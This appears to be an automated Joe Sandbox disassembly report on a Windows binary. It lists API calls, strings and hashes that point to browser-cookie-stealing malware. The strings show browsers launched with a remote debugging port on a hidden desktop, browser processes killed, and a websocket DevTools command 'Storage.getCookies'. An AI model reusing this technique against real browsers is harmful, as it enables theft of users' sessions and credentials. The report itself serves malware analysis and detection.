                          • Opcode Fuzzy Hash: 736fa34ff351e2161c0b25283d16a3d72598f538233d3af201908ba81e745402
                          • Instruction Fuzzy Hash: B0C1D270910B269BCB61EF75EC99AEE77BABF05301F040128F84A9B651DB38DD458BD0
                          APIs
                          • memset.MSVCRT ref: 00629790
                          • lstrcat.KERNEL32(?,?), ref: 006297A0
                          • lstrcat.KERNEL32(?,?), ref: 006297B1
                          • lstrcat.KERNEL32(?, --remote-debugging-port=9229 --profile-directory="), ref: 006297C3
                          • memset.MSVCRT ref: 006297D7
                            • Part of subcall function 00643E70: lstrcpy.KERNEL32(00000000,0064CFEC), ref: 00643EA5
                            • Part of subcall function 00643E70: lstrcpy.KERNEL32(00000000,01299DD8), ref: 00643ECF
                            • Part of subcall function 00643E70: GetSystemTime.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,?,?,0062134E,?,0000001A), ref: 00643ED9
                          • wsprintfA.USER32 ref: 00629806
                          • OpenDesktopA.USER32(?,00000000,00000001,10000000), ref: 00629827
                          • CreateDesktopA.USER32(?,00000000,00000000,00000000,10000000,00000000), ref: 00629844
                            • Part of subcall function 006446A0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 006446B9
                            • Part of subcall function 006446A0: Process32First.KERNEL32(00000000,00000128), ref: 006446C9
                            • Part of subcall function 006446A0: Process32Next.KERNEL32(00000000,00000128), ref: 006446DB
                            • Part of subcall function 006446A0: StrCmpCA.SHLWAPI(?,?), ref: 006446ED
                            • Part of subcall function 006446A0: OpenProcess.KERNEL32(00000001,00000000,?), ref: 00644702
                            • Part of subcall function 006446A0: TerminateProcess.KERNEL32(00000000,00000000), ref: 00644711
                            • Part of subcall function 006446A0: CloseHandle.KERNEL32(00000000), ref: 00644718
                            • Part of subcall function 006446A0: Process32Next.KERNEL32(00000000,00000128), ref: 00644726
                            • Part of subcall function 006446A0: CloseHandle.KERNEL32(00000000), ref: 00644731
                          • lstrcat.KERNEL32(00000000,?), ref: 00629878
                          • lstrcat.KERNEL32(00000000,?), ref: 00629889
                          • lstrcat.KERNEL32(00000000,00654B60), ref: 0062989B
                          • memset.MSVCRT ref: 006298AF
                          • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 006298D4
                          • lstrcpy.KERNEL32(00000000,?), ref: 00629903
                          • StrStrA.SHLWAPI(00000000,0129D990), ref: 00629919
                          • lstrcpyn.KERNEL32(008593D0,00000000,00000000), ref: 00629938
                          • lstrlen.KERNEL32(?), ref: 0062994B
                          • wsprintfA.USER32 ref: 0062995B
                          • lstrcpy.KERNEL32(?,00000000), ref: 00629971
                          • Sleep.KERNEL32(00001388), ref: 006299E7
                            • Part of subcall function 00621530: lstrcpy.KERNEL32(00000000,?), ref: 00621557
                            • Part of subcall function 00621530: lstrcpy.KERNEL32(00000000,?), ref: 00621579
                            • Part of subcall function 00621530: lstrcpy.KERNEL32(00000000,?), ref: 0062159B
                            • Part of subcall function 00621530: lstrcpy.KERNEL32(00000000,?), ref: 006215FF
                            • Part of subcall function 006292B0: strlen.MSVCRT ref: 006292E1
                            • Part of subcall function 006292B0: strlen.MSVCRT ref: 006292FA
                            • Part of subcall function 006292B0: strlen.MSVCRT ref: 00629399
                            • Part of subcall function 006292B0: strlen.MSVCRT ref: 006293E6
                            • Part of subcall function 00644740: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000,?), ref: 00644759
                            • Part of subcall function 00644740: Process32First.KERNEL32(00000000,00000128), ref: 00644769
                            • Part of subcall function 00644740: Process32Next.KERNEL32(00000000,00000128), ref: 0064477B
                            • Part of subcall function 00644740: OpenProcess.KERNEL32(00000001,00000000,?), ref: 0064479C
                            • Part of subcall function 00644740: TerminateProcess.KERNEL32(00000000,00000000), ref: 006447AB
                            • Part of subcall function 00644740: CloseHandle.KERNEL32(00000000), ref: 006447B2
                            • Part of subcall function 00644740: Process32Next.KERNEL32(00000000,00000128), ref: 006447C0
                            • Part of subcall function 00644740: CloseHandle.KERNEL32(00000000), ref: 006447CB
                          • CloseDesktop.USER32(?), ref: 00629A1C
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2195559787.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                          • Associated: 00000000.00000002.2195543682.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.0000000000858000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195739005.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.000000000086C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.00000000009EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196012801.0000000000B02000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196121789.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196137696.0000000000C96000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_620000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$Process32lstrcat$Close$HandleNextProcessstrlen$CreateDesktopOpenmemset$FirstSnapshotTerminateToolhelp32wsprintf$FolderPathSleepSystemTimelstrcpynlstrlen
                          • String ID: --remote-debugging-port=9229 --profile-directory="$%s%s$D
                          • API String ID: 958055206-1862457068
                          • Opcode ID: 1a5ffc36a6eb201db5d291d7e10d7a458034218aa5ab7fd0bedcc89a10451038
                          • Instruction ID: 9ba07d9edcbd704adfbc49981c8bb24bee9494b4ffacb7428f155ae4a74a2a90
                          • Opcode Fuzzy Hash: 1a5ffc36a6eb201db5d291d7e10d7a458034218aa5ab7fd0bedcc89a10451038
                          • Instruction Fuzzy Hash: F591A0B1A00718EBDB50DBA4DC46FDE77B9BF48701F104599F609A7280DF74AA448FA4
                          APIs
                          • wsprintfA.USER32 ref: 0063E22C
                          • FindFirstFileA.KERNEL32(?,?), ref: 0063E243
                          • StrCmpCA.SHLWAPI(?,006517A0), ref: 0063E263
                          • StrCmpCA.SHLWAPI(?,006517A4), ref: 0063E27D
                          • wsprintfA.USER32 ref: 0063E2A2
                          • StrCmpCA.SHLWAPI(?,0064CFEC), ref: 0063E2B4
                          • wsprintfA.USER32 ref: 0063E2D1
                            • Part of subcall function 0063EDE0: lstrcpy.KERNEL32(00000000,?), ref: 0063EE12
                          • wsprintfA.USER32 ref: 0063E2F0
                          • PathMatchSpecA.SHLWAPI(?,?), ref: 0063E304
                          • lstrcat.KERNEL32(?,0129E488), ref: 0063E335
                          • lstrcat.KERNEL32(?,00651794), ref: 0063E347
                          • lstrcat.KERNEL32(?,?), ref: 0063E358
                          • lstrcat.KERNEL32(?,00651794), ref: 0063E36A
                          • lstrcat.KERNEL32(?,?), ref: 0063E37E
                          • CopyFileA.KERNEL32(?,?,00000001), ref: 0063E394
                          • lstrcpy.KERNEL32(00000000,?), ref: 0063E3D2
                          • lstrcpy.KERNEL32(00000000,?), ref: 0063E422
                          • DeleteFileA.KERNEL32(?), ref: 0063E45C
                            • Part of subcall function 00621530: lstrcpy.KERNEL32(00000000,?), ref: 00621557
                            • Part of subcall function 00621530: lstrcpy.KERNEL32(00000000,?), ref: 00621579
                            • Part of subcall function 00621530: lstrcpy.KERNEL32(00000000,?), ref: 0062159B
                            • Part of subcall function 00621530: lstrcpy.KERNEL32(00000000,?), ref: 006215FF
                          • FindNextFileA.KERNEL32(00000000,?), ref: 0063E49B
                          • FindClose.KERNEL32(00000000), ref: 0063E4AA
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2195559787.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                          • Associated: 00000000.00000002.2195543682.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.0000000000858000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195739005.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.000000000086C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.00000000009EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196012801.0000000000B02000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196121789.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196137696.0000000000C96000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_620000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrcat$Filewsprintf$Find$CloseCopyDeleteFirstMatchNextPathSpec
                          • String ID: %s\%s$%s\*
                          • API String ID: 1375681507-2848263008
                          • Opcode ID: 6265b9c64d7639abde4039fbfaef1a13b51c6f856559024391883b191a7390aa
                          • Instruction ID: 616605a195d22039f4b3112dc671e13d1906a8e745815b77bb7cb89e88a2daae
                          • Opcode Fuzzy Hash: 6265b9c64d7639abde4039fbfaef1a13b51c6f856559024391883b191a7390aa
                          • Instruction Fuzzy Hash: E2818771900619EBCB20EF64DC45AEF77BABF48301F004999F54A97281DF35AA44CFA0
                          APIs
                          • lstrcpy.KERNEL32(00000000,0064CFEC), ref: 006216E2
                          • lstrcpy.KERNEL32(00000000,0064CFEC), ref: 00621719
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0062176C
                          • lstrcat.KERNEL32(00000000), ref: 00621776
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 006217A2
                          • lstrcpy.KERNEL32(00000000,?), ref: 006218F3
                          • lstrcat.KERNEL32(00000000,00000000), ref: 006218FE
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2195559787.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                          • Associated: 00000000.00000002.2195543682.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.0000000000858000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195739005.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.000000000086C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.00000000009EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196012801.0000000000B02000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196121789.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196137696.0000000000C96000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_620000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrcat
                          • String ID: \*.*
                          • API String ID: 2276651480-1173974218
                          • Opcode ID: 25d5b850c58f622962113fee4569db604b3ac1710b5ab9560f71f67c034f61b2
                          • Instruction ID: 29bce35548615683f2ea782d9644d77f1ca9571bcecb92d850c91108a1155121
                          • Opcode Fuzzy Hash: 25d5b850c58f622962113fee4569db604b3ac1710b5ab9560f71f67c034f61b2
                          • Instruction Fuzzy Hash: F981AF70D10A2AABCB61EF69E895AEE77B7BF15301F040128F809AB655DB34DC41CF91
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 0063DD45
                          • RtlAllocateHeap.NTDLL(00000000), ref: 0063DD4C
                          • wsprintfA.USER32 ref: 0063DD62
                          • FindFirstFileA.KERNEL32(?,?), ref: 0063DD79
                          • StrCmpCA.SHLWAPI(?,006517A0), ref: 0063DD9C
                          • StrCmpCA.SHLWAPI(?,006517A4), ref: 0063DDB6
                          • wsprintfA.USER32 ref: 0063DDD4
                          • DeleteFileA.KERNEL32(?), ref: 0063DE20
                          • CopyFileA.KERNEL32(?,?,00000001), ref: 0063DDED
                            • Part of subcall function 00621530: lstrcpy.KERNEL32(00000000,?), ref: 00621557
                            • Part of subcall function 00621530: lstrcpy.KERNEL32(00000000,?), ref: 00621579
                            • Part of subcall function 00621530: lstrcpy.KERNEL32(00000000,?), ref: 0062159B
                            • Part of subcall function 00621530: lstrcpy.KERNEL32(00000000,?), ref: 006215FF
                            • Part of subcall function 0063D980: memset.MSVCRT ref: 0063D9A1
                            • Part of subcall function 0063D980: memset.MSVCRT ref: 0063D9B3
                            • Part of subcall function 0063D980: SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 0063D9DB
                            • Part of subcall function 0063D980: lstrcpy.KERNEL32(00000000,?), ref: 0063DA0E
                            • Part of subcall function 0063D980: lstrcat.KERNEL32(?,00000000), ref: 0063DA1C
                            • Part of subcall function 0063D980: lstrcat.KERNEL32(?,0129DA98), ref: 0063DA36
                            • Part of subcall function 0063D980: lstrcat.KERNEL32(?,?), ref: 0063DA4A
                            • Part of subcall function 0063D980: lstrcat.KERNEL32(?,0129CED8), ref: 0063DA5E
                            • Part of subcall function 0063D980: lstrcpy.KERNEL32(00000000,?), ref: 0063DA8E
                            • Part of subcall function 0063D980: GetFileAttributesA.KERNEL32(00000000), ref: 0063DA95
                          • FindNextFileA.KERNEL32(00000000,?), ref: 0063DE2E
                          • FindClose.KERNEL32(00000000), ref: 0063DE3D
                          • lstrcat.KERNEL32(?,0129E488), ref: 0063DE66
                          • lstrcat.KERNEL32(?,0129D1A8), ref: 0063DE7A
                          • lstrlen.KERNEL32(?), ref: 0063DE84
                          • lstrlen.KERNEL32(?), ref: 0063DE92
                          • lstrcpy.KERNEL32(00000000,?), ref: 0063DED2
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2195559787.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                          • Associated: 00000000.00000002.2195543682.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.0000000000858000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195739005.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.000000000086C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.00000000009EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196012801.0000000000B02000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196121789.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196137696.0000000000C96000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_620000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrcat$File$Find$Heaplstrlenmemsetwsprintf$AllocateAttributesCloseCopyDeleteFirstFolderNextPathProcess
                          • String ID: %s\%s$%s\*
                          • API String ID: 4184593125-2848263008
                          • Opcode ID: c1f9101b145c259539b71ebdff12cc7c892dd8159f3f66440259e7c45167e3b1
                          • Instruction ID: 9306ca0856c4dcd97c408b3a5da3021ab7eb8b7e53bb7fb311d7830e3fe4570e
                          • Opcode Fuzzy Hash: c1f9101b145c259539b71ebdff12cc7c892dd8159f3f66440259e7c45167e3b1
                          • Instruction Fuzzy Hash: A4614471910619EBCB50EF74EC89ADE77BABF48301F004599F545A7291DF349A44CF90
                          APIs
                          • wsprintfA.USER32 ref: 0063D54D
                          • FindFirstFileA.KERNEL32(?,?), ref: 0063D564
                          • StrCmpCA.SHLWAPI(?,006517A0), ref: 0063D584
                          • StrCmpCA.SHLWAPI(?,006517A4), ref: 0063D59E
                          • lstrcat.KERNEL32(?,0129E488), ref: 0063D5E3
                          • lstrcat.KERNEL32(?,0129E438), ref: 0063D5F7
                          • lstrcat.KERNEL32(?,?), ref: 0063D60B
                          • lstrcat.KERNEL32(?,?), ref: 0063D61C
                          • lstrcat.KERNEL32(?,00651794), ref: 0063D62E
                          • lstrcat.KERNEL32(?,?), ref: 0063D642
                          • lstrcpy.KERNEL32(00000000,?), ref: 0063D682
                          • lstrcpy.KERNEL32(00000000,?), ref: 0063D6D2
                          • FindNextFileA.KERNEL32(00000000,?), ref: 0063D737
                          • FindClose.KERNEL32(00000000), ref: 0063D746
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2195559787.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                          • Associated: 00000000.00000002.2195543682.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.0000000000858000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195739005.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.000000000086C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.00000000009EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196012801.0000000000B02000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196121789.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196137696.0000000000C96000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_620000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$Find$Filelstrcpy$CloseFirstNextwsprintf
                          • String ID: %s\%s
                          • API String ID: 50252434-4073750446
                          • Opcode ID: 4eebdbeb1239417f3cb0ecec03a0a8832457d54d58344e3d649a451dc59610b5
                          • Instruction ID: b9b7ca122b08d1d80baea0cd2bf4e1df3a48bb4b32fec3a29fd9aaaf55b5c33a
                          • Opcode Fuzzy Hash: 4eebdbeb1239417f3cb0ecec03a0a8832457d54d58344e3d649a451dc59610b5
                          • Instruction Fuzzy Hash: 3C6187B1910619EBCB10EF74EC85ADE77BAFF48311F004599E549A7250DB34EA44CF90
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2195559787.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                          • Associated: 00000000.00000002.2195543682.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.0000000000858000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195739005.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.000000000086C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.00000000009EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196012801.0000000000B02000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196121789.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196137696.0000000000C96000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_620000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Xinvalid_argumentstd::_
                          • String ID: Connection: UpgradeUpgrade: websocketSec-WebSocket-Key: $Sec-WebSocket-Version: 13$ HTTP/1.1Host: $:$ws://${"id":1,"method":"Storage.getCookies"}
                          • API String ID: 909987262-758292691
                          • Opcode ID: df5b9da72b4736628359348a8c98e6045ff50eb801e4f2a7bf154cea52e146b7
                          • Instruction ID: 9b16691ba851f8c29fbaaed0049e1f7f5827d8ed3e048d26751a8f275b13019c
                          • Opcode Fuzzy Hash: df5b9da72b4736628359348a8c98e6045ff50eb801e4f2a7bf154cea52e146b7
                          • Instruction Fuzzy Hash: 9AA25771D012699FDB60DFA8C8817EDBBB6BF48300F1481AAE509A7342DB745E85CF90
                          APIs
                          • lstrcpy.KERNEL32(00000000,0064CFEC), ref: 006323D4
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 006323F7
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00632402
                          • lstrlen.KERNEL32(\*.*), ref: 0063240D
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0063242A
                          • lstrcat.KERNEL32(00000000,\*.*), ref: 00632436
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0063246A
                          • FindFirstFileA.KERNEL32(00000000,?), ref: 00632486
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2195559787.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                          • Associated: 00000000.00000002.2195543682.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.0000000000858000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195739005.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.000000000086C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.00000000009EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196012801.0000000000B02000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196121789.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196137696.0000000000C96000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_620000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                          • String ID: \*.*
                          • API String ID: 2567437900-1173974218
                          • Opcode ID: ec733d76f355ce0ee226ef0214d6f3cb32d806af5613dd725c5be9ddfd5ba278
                          • Instruction ID: 9a8cb4cfd79dd1f4cb6285c40eb86d6bacdb260d97b78f738e783a15634f1168
                          • Opcode Fuzzy Hash: ec733d76f355ce0ee226ef0214d6f3cb32d806af5613dd725c5be9ddfd5ba278
                          • Instruction Fuzzy Hash: FD417370511A279BCB71EF29EC96ADE73A6BF14301F005228F84997A56CB34DC458F94
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2195756620.000000000086C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                          • Associated: 00000000.00000002.2195543682.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.0000000000621000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.0000000000858000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195739005.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.00000000009EB000.00000040.00000001.01000000.00000003.sdmpDownload File
